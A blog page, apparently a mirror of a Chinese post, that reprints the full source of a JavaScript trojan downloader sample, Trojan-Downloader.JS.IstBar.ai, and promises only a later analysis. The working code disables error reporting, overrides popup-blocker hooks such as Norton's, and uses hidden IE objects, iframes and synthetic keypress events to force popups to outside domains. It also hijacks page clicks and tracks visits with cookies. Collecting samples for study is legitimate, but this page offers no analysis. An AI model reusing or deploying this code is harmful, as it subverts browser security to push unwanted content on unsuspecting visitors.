zoukankan
html css js c++ java
Trojan program TrojanDownloader.JS.IstBar.ai 病毒样本
//
detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js
var
paypopupURL
=
"
http://www.m117.cn/?f
"
;
var
usingActiveX
=
true
;
function
blockError()
{
return
true
;}
window.onerror
=
blockError;
//
bypass norton internet security popup blocker
if
(window.SymRealWinOpen)
{window.open
=
SymRealWinOpen;}
if
(window.NS_ActualOpen)
{window.open
=
NS_ActualOpen;}
if
(
typeof
(usingClick)
==
'undefined')
{
var
usingClick
=
false
;}
if
(
typeof
(usingActiveX)
==
'undefined')
{
var
usingActiveX
=
false
;}
if
(
typeof
(popwin)
==
'undefined')
{
var
popwin
=
null
;}
if
(
typeof
(poped)
==
'undefined')
{
var
poped
=
false
;}
var
blk
=
1
;
var
setupClickSuccess
=
false
;
var
googleInUse
=
false
;
var
myurl
=
location.href
+
'
/
';
var
MAX_TRIED
=
20
;
var
activeXTried
=
false
;
var
tried
=
0
;
var
randkey
=
'
0
';
//
random key from server
var
myWindow;
var
popWindow;
var
setupActiveXSuccess
=
0
;
//
bypass IE functions
function
setupActiveX()
{
if
(usingActiveX)
{
try
{
if
(setupActiveXSuccess
<
5
)
{document.write('
<
DIV STYLE
=
"
display:none;
"
><
INPUT ID
=
"
autoHit
"
TYPE
=
"
TEXT
"
ONKEYPRESS
=
"
showActiveX()
"
></
DIV
>
');
popWindow
=
window.createPopup();
popWindow.document.body.innerHTML
=
'
<
DIV ID
=
"
objectRemover
"
><
OBJECT ID
=
"
getParentDiv
"
STYLE
=
"
position:absolute;top:0px;left:0px;
"
WIDTH
=
1
HEIGHT
=
1
DATA
=
"
http://www.resume-cn.com/firefox.htm
"
TYPE
=
"
text/html
"
></
OBJECT
></
DIV
>
';
//
error page
document.write('
<
IFRAME NAME
=
"
popIframe
"
STYLE
=
"
position:absolute;top:-100px;left:0px;1px;height:1px;
"
src
=
"
/about:blank
"
></
IFRAME
>
');
popIframe.document.write('
<
OBJECT ID
=
"
getParentFrame
"
STYLE
=
"
position:absolute;top:0px;left:0px;
"
WIDTH
=
1
HEIGHT
=
1
DATA
=
"
http://www.resume-cn.com/firefox.htm
"
TYPE
=
"
text/html
"
></
OBJECT
>
');
//
error page
setupActiveXSuccess
=
6
;}
}
catch
(e)
{
if
(setupActiveXSuccess
<
5
)
{setupActiveXSuccess
++
;setTimeout('setupActiveX();',
500
);}
else
if
(setupActiveXSuccess
==
5
)
{activeXTried
=
true
;setupClick();}
}
}
}
function
tryActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(setupActiveXSuccess
==
6
&&
googleInUse
&&
popWindow
&&
popWindow.document.getElementById('getParentDiv')
&&
popWindow.document.getElementById('getParentDiv').object
&&
popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow
=
popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else
if
(setupActiveXSuccess
==
6
&&
!
googleInUse
&&
popIframe
&&
popIframe.getParentFrame
&&
popIframe.getParentFrame.object
&&
popIframe.getParentFrame.object.parentWindow)
{
myWindow
=
popIframe.getParentFrame.object.parentWindow;
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',
200
);
tried
++
;
if
(tried
>=
MAX_TRIED
&&
!
activeXTried)
{
activeXTried
=
true
;
setupClick();}
return
;
}
openActiveX();
window.windowFired
=
true
;self.focus();
}
}
function
openActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(myWindow
&&
window.windowFired)
{
window.windowFired
=
false
;
document.getElementById('autoHit').fireEvent(
"
onkeypress
"
,(document.createEventObject().keyCode
=
escape(randkey).substring(
1
)));
}
else
{
setTimeout('openActiveX();',
100
);
}
tried
++
;
if
(tried
>=
MAX_TRIED)
{activeXTried
=
true
;setupClick();
}
}
}
function
showActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(googleInUse)
{
window.daChildObject
=
popWindow.document.getElementById('objectRemover').children(
0
);
window.daChildObject
=
popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow
=
myWindow.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(newWindow)
{newWindow.blur();self.focus();activeXTried
=
true
;poped
=
true
;}
else
{
if
(
!
googleInUse)
{googleInUse
=
true
;tried
=
0
;tryActiveX();}
else
{activeXTried
=
true
;setupClick();}
}
}
}
//
end bypass IE functions
//
normal call functions
function
paypopup()
{
if
(
!
poped)
{
if
(
!
usingClick
&&
!
usingActiveX)
{
popwin
=
window.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(popwin)
{poped
=
true
;}
self.focus();}
}
if
(
!
poped)
{
if
(usingActiveX)
{tryActiveX();}
else
{setupClick();}
}
}
//
end normal call functions
//
onclick call functions
function
setupClick()
{
if
(
!
poped
&&
!
setupClickSuccess)
{
if
(window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick
=
document.onclick;document.onclick
=
gopop;self.focus();setupClickSuccess
=
true
;}
}
function
gopop()
{
if
(
!
poped)
{popwin
=
window.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(popwin)
{poped
=
true
;}
self.focus();}
if
(
typeof
(prePaypopOnclick)
==
"
function
"
)
{prePaypopOnclick();}
}
//
end onclick call functions
//
check version
function
detectGoogle()
{
if
(usingActiveX)
{
try
{document.write('
<
DIV STYLE
=
"
display:none;
"
><
OBJECT ID
=
"
detectGoogle
"
CLASSID
=
"
clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB
"
STYLE
=
"
display:none;
"
CODEBASE
=
"
view-source:about:blank
"
></
OBJECT
></
DIV
>
');googleInUse
|=
(
typeof
(document.getElementById('detectGoogle'))
==
'object');}
catch
(e)
{setTimeout('detectGoogle();',
50
);}
}
}
function
version()
{
var
os
=
'W0';
var
bs
=
'I0';
var
isframe
=
false
;
var
browser
=
window.navigator.userAgent;
if
(browser.indexOf('Win')
!=
-
1
)
{os
=
'W1';}
if
(browser.indexOf(
"
SV1
"
)
!=
-
1
)
{bs
=
'I2';}
else
if
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
{bs
=
"
I0
"
;}
else
if
(browser.indexOf(
"
Firefox
"
)
!=
-
1
)
{bs
=
"
I0
"
;}
else
if
(browser.indexOf(
"
Microsoft
"
)
!=
-
1
||
browser.indexOf(
"
MSIE
"
)
!=
-
1
)
{bs
=
'I1';}
if
(top.location
!=
this
.location)
{isframe
=
true
;}
paypopupURL
=
paypopupURL;
usingClick
=
blk
&&
((browser.indexOf(
"
SV1
"
)
!=
-
1
)
||
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
||
(browser.indexOf(
"
Firefox
"
)
!=
-
1
));usingActiveX
=
blk
&&
(browser.indexOf(
"
SV1
"
)
!=
-
1
)
&&
!
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
&&
((browser.indexOf(
"
Microsoft
"
)
!=
-
1
)
||
(browser.indexOf(
"
MSIE
"
)
!=
-
1
));detectGoogle();
}
version();
//
end check version
function
loadingPop()
{
if
(
!
usingClick
&&
!
usingActiveX)
{
paypopup();
}
else
if
(usingActiveX)
{tryActiveX();}
else
{setupClick();}
}
//
\\\\\\\\\\\\\\
function
GetCookie (name)
{
var
arg
=
name
+
"
=
"
;
var
alen
=
arg.length;
var
clen
=
document.cookie.length;
var
i
=
0
;
while
(i
<
clen)
{
var
j
=
i
+
alen;
if
(document.cookie.substring(i, j)
==
arg)
return
getCookieVal (j);
i
=
document.cookie.indexOf(
"
"
, i)
+
1
;
if
(i
==
0
)
break
;
}
return
null
;
}
function
SetCookie (name, value)
{
var
argv
=
SetCookie.arguments;
var
argc
=
SetCookie.arguments.length;
var
expires
=
(argc
>
2
)
?
argv[
2
] :
null
;
var
path
=
(argc
>
3
)
?
argv[
3
] :
null
;
var
domain
=
(argc
>
4
)
?
argv[
4
] :
null
;
var
secure
=
(argc
>
5
)
?
argv[
5
] :
false
;
document.cookie
=
name
+
"
=
"
+
escape (value)
+
((expires
==
null
)
?
""
: (
"
; expires=
"
+
expires.toGMTString()))
+
((path
==
null
)
?
""
: (
"
; path=
"
+
path))
+
((domain
==
null
)
?
""
: (
"
; domain=
"
+
domain))
+
((secure
==
true
)
?
"
; secure
"
:
""
);
}
function
DeleteCookie (name)
{
var
exp
=
new
Date();
exp.setTime (exp.getTime()
-
1
);
//
This cookie is history
var
cval
=
0
;
document.cookie
=
name
+
"
=
"
+
cval
+
"
; expires=
"
+
exp.toGMTString();
}
//
设置cookies时间,自己根据情况设置。
var
expDays
=
1
;
var
exp
=
new
Date();
exp.setTime(exp.getTime()
+
(expDays
*
6
*
60
*
60
*
1000
));
function
amt()
{
var
count
=
GetCookie('countsports');
//
同一ip只显示一次
//
var count;//同一ip只显示N次
//
alert(count);
//
count = null;
if
(count
==
null
)
{
SetCookie('countsports','
1
')
return
1
}
else
{
var
newcount
=
parseInt(count)
+
1
;
if
(newcount
<
2
) count
=
1
;
SetCookie('countsports',newcount,exp);
//
DeleteCookie('countsports')
return
newcount
}
}
function
getCookieVal(offset)
{
var
endstr
=
document.cookie.indexOf (
"
;
"
, offset);
if
(endstr
==
-
1
)
endstr
=
document.cookie.length;
return
unescape(document.cookie.substring(offset, endstr));
}
function
btpop()
{
if
(amt()
==
1
)
{
openWindowBack();
try
{
aryADSeq.push(
"
openWindowBack()
"
);
}
catch
(e)
{
openWindowBack();
}
}
}
function
openWindowBack()
{
myurl
=
myurl.substring(
0
, myurl.indexOf('
/
',
8
));
if
(myurl
==
'')
{myurl
=
'.';}
setupActiveX();
loadingPop();
//
self.focus();
}
btpop()
有时间分析一下
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
elastic
原生js获取css样式和修改css样式
React项目开发中的数据管理
js获取鼠标位置
闭包
HTML5与HTML4的区别
JSON 相关
RESTful Web Services初探
IE6浏览器兼容问题及部分解决方案
关于Doctype
原文地址:https://www.cnblogs.com/evlon/p/810447.html
最新文章
Spring Auto scanning components
Log4j使用教程
c3p0
Eclipse 通过JPA自动生成注解实体
【leetcode】151. 翻转字符串里的单词
【leetcode】145. 二叉树的后序遍历
【leetcode】152. 乘积最大子数组
【leetcode】144. 二叉树的前序遍历
【leetcode】143. 重排链表
【leetcode】142. 环形链表 II
热门文章
【leetcode】139. 单词拆分
【leetcode】134. 加油站
【leetcode】131. 分割回文串
【leetcode】127. 单词接龙
js拖入拖出效果
js拖拽效果
js改变div大小
elasticDiv
elasticChangeDiv
elasticRect
Copyright © 2011-2022 走看看